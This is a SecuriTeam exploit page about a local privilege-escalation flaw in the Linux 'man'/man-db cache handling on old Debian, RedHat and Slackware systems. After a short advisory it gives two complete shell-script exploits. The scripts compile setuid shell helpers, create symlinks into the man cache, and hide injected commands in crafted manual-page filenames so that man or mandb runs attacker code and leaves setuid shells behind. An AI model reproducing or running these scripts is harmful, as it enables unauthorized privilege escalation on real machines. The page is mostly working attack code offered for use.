SecuriTeam - Linux Man Malicious Cache File Creation Vulnerability (Exploit)

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

A vulnerability exists in the 'man' system manual pager program.

It is possible for local users to cause man to cache files in the system cache directory from outside of the configured manual page hierarchy search path.

Combined with the behaviors of 'man' and 'mandb' or any other utilities that trust cache filenames, it may be possible to use this vulnerability to elevate privileges.

Credit:
The information has been provided by Luki R..

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable systems:
Debian version 2.1
Debian version 2.2
RedHat version 6.1
RedHat version 6.2
RedHat version 7.0
RedHat version 7.1
Slackware version 8.0

Exploit code:
#!/bin/sh
###################################################
# Fri Jun 1 23:00:10 JAVT 2001 #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs #
# proof of concept. #
# version affected: #
# <= man-db 2.3.16-3,2.3.17-3.2 #
# #
# tested on: #
# debian2.2 -> instant man suidshell #
# #
# by jenggo <luki@karet.org> #
# #
# thanx to: echo, mayonaise all @ #karet #
# ==> Mr.dur,amien,mega,akbar ... damai,damai ;) #
###################################################

TMPDIR=/tmp/mywork

RAND=`/bin/date +%S`
echo "making working dir ..."
/bin/mkdir -p $TMPDIR/man/man1
/bin/chmod 777 $TMPDIR
/bin/chmod 777 $TMPDIR/man

echo "copying needed files ..."
if [ ! -x /usr/bin/groff ] || [ ! -x /usr/bin/grotty ] || [ ! -x /usr/bin/troff ] || [ ! -x /usr/bin/gcc ]; then
  echo "Failed, I need executable : groff,grotty,troff,gcc"
  echo "cleaning up ..."
  /bin/rm -rf $TMPDIR
fi

/bin/cp /usr/bin/groff $TMPDIR
/bin/cp /usr/bin/grotty $TMPDIR
/bin/cp /usr/bin/troff $TMPDIR

echo "compiling helper ..."
/bin/cat > $TMPDIR/hehe.c <<EOF
#include <stdio.h>

int main()
{
  char *aa[2]={"/bin/sh", NULL};

  setreuid(6,6);
  execve(aa[0], aa, NULL);
  exit(0);
}
EOF

/usr/bin/gcc $TMPDIR/hehe.c -o $TMPDIR/hehe 2>/dev/null 1>/dev/null

/bin/cat > $TMPDIR/mandeb.c <<EOF
#include <stdio.h>

int main()
{
  seteuid(6);
  setuid(6);
  system("/bin/cp /tmp/mywork/hehe /tmp/huhu");
  system("/bin/chown man /tmp/huhu");
  system("/bin/chmod 4755 /tmp/huhu");
  exit(0);
}
EOF

/usr/bin/gcc $TMPDIR/mandeb.c -o $TMPDIR/mandeb 2>/dev/null 1>/dev/null

echo "making our manpage ..."
/bin/ln -s /var/cache/man/cat1 $TMPDIR/man/cat1
/bin/echo "bebas euy"|/bin/gzip -c > $TMPDIR/man/man1/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls.1.gz"
/bin/touch $TMPDIR/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls"
export PATH=$TMPDIR
/usr/bin/man "cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls" 2> /dev/null 1>/dev/null

echo "/bin/ls -la /var/cache/man/cat1"
/bin/ls -la /var/cache/man/cat1
export PATH=/var/cache:/bin:/sbin:/usr/bin:/usr/sbin

echo "exploiting ..."
/bin/rm -f /tmp/huhu
/usr/lib/man-db/mandb 2>/dev/null 1>/dev/null
/bin/rm -rf /tmp/mywork

echo
echo "/bin/ls -la /tmp"
/bin/ls -la /tmp

if [ -u /tmp/huhu ]; then
  echo "file /tmp/huhu is setuid. Hope it's owned by man"
  echo "Have a nice day"
  echo "[----- jenggo <luki@karet.org> -----]"
  /tmp/huhu
else
  echo "exploit failed, cleaning up our binary ..."
fi

echo "cleaning up our preparation step dir ..."
/bin/rm -rf /tmp/$TMPDIR

#!/bin/sh
###################################################
# Fri May 18 22:08:42 JAVT 2001 #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs #
# proof of concept. #
# version affected: #
# <= man-1.5h1-20 #
# #
# tested on: #
# redhat7.1 -> any user suidshell #
# #
# by jenggo <luki@karet.org> #
# #
# thanx to: echo, mayonaise all @ #karet #
###################################################
# hmmm ... ada yang bisa modif jadi instant root ?? :P

# IMPORTANT !
# set this to command that has no man page
DEADLY_BIN="netconf"

# on <= redhat6.2 could be /var/cache/catman
CACHEDIR="/var/cache/man"
CACHEDIR2="/var/cache/catman"

GZ="/bin/gzip"

echo -n "check man dir ..."

if [ ! -d $CACHEDIR ]; then
  if [ -d $CACHEDIR2 ]; then
    CACHEDIR=$CACHEDIR2
    echo "OK"
  else
    echo "FAILED"
    echo "check your man dir"
    exit
  fi
else
  echo "OK"
fi

echo -n "checking sgid/suid man ..."
if [ ! -g /usr/bin/man ]; then
# is it a debian man?
  if [ -d /usr/lib/man-db ]; then
    echo "FAILED"
    echo "I think this is debian style man, use other script"
  else
    echo "FAILED"
    echo "can't find executables sgid man binary"
  fi
  exit
else
  echo "OK"
fi

echo "making our man directory ..."
echo

mkdir -p /tmp/man/man1
mkdir /tmp/cat1
mkdir /tmp/mine
chmod 777 /tmp/mine

echo "creating our man page ..."
echo

echo "BEBAS EUY"|$GZ -c > /tmp/man/man1/huhuy.1.gz

echo "creating symlink ..."
echo

ln -s "$CACHEDIR/cat1/netconf.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" /tmp/cat1/huhuy.1.gz

echo "creating our bogus command ..."
echo
touch /tmp/huhuy

echo "making manx shellscript"
echo

/bin/cat > /tmp/mine/manx <<EOF
#!/bin/sh

export PATH="/bin:/usr/bin:/sbin:/usr/sbin"
VICTIM=\`/usr/bin/id -u\`

/bin/cat >/tmp/mine/my"\$VICTIM".c <<EOG
#include <stdio.h>
void main()
{
  char *hh[2]={"/bin/sh", NULL};
  setreuid(\$VICTIM,\$VICTIM);
  execve(hh[0], hh, NULL);
}
EOG

/usr/bin/gcc /tmp/mine/my"\$VICTIM".c -o /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null

/bin/rm -f /tmp/mine/my"\$VICTIM".c 1>/dev/null 2>/dev/null

chmod 6755 /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null

EOF

chmod 755 /tmp/mine/manx

if [ ! -x /tmp/mine/manx ]; then
  echo "file: /tmp/mine/manx can't be set executable !"
  echo "fix the exploit first"
  echo "cleaning up ..."
  /bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
  exit
fi

echo "prepare to exploit ..."
echo

export PATH=../../../../../../tmp
cd /

echo "exploiting ..."
echo

/usr/bin/man -d huhuy 2>/dev/null

export PATH=/bin:/usr/bin

echo "checking our exploit result"
echo

if [ -f "/var/cache/man/cat1/$DEADLY_BIN.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" ]; then
  echo "content of $CACHEDIR/cat1:"
  ls -l $CACHEDIR/cat1
  echo
  echo "exploit OK, now wait till somebody run 'man $DEADLY_BIN'"
  echo "and your suidshells will be waiting at /tmp/mine/* :)"
  echo "bye."
  echo "[-------- jenggo <luki@karet.org> --------]"
  echo
else
  echo "hrrmm ... exploit failed to create offending file !"
  echo "check again please"
  echo "cleaning up ..."
  /bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
fi

blog comments powered by Disqus

	Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit
	IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS
	Progea Movicon TCPUploadServer Remote Exploit
	Trango Broadband Wireless Rogue SU Authentication Bug
	Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow
	Family Connections Multiple Remote Vulnerabilities
	VideoCache vccleaner Root Vulnerability
	QuickHeal Antivirus 2010 Local Privilege Escalation
	DubSite CMS Cross Site Request Forgery Vulnerability
	SonicWall Global Management System XSS Vulnerability
	Sonicwall NSA E7500 XSS Vulnerability
	Juniper Security Threat Response Manager XSS Vulnerability
	Hacking CSRF Tokens using CSS History Hack
	Sun Java System Identiy Manager Users Enumeration
	Microsoft Internet Explorer XML Buffer Overflow (Exploit)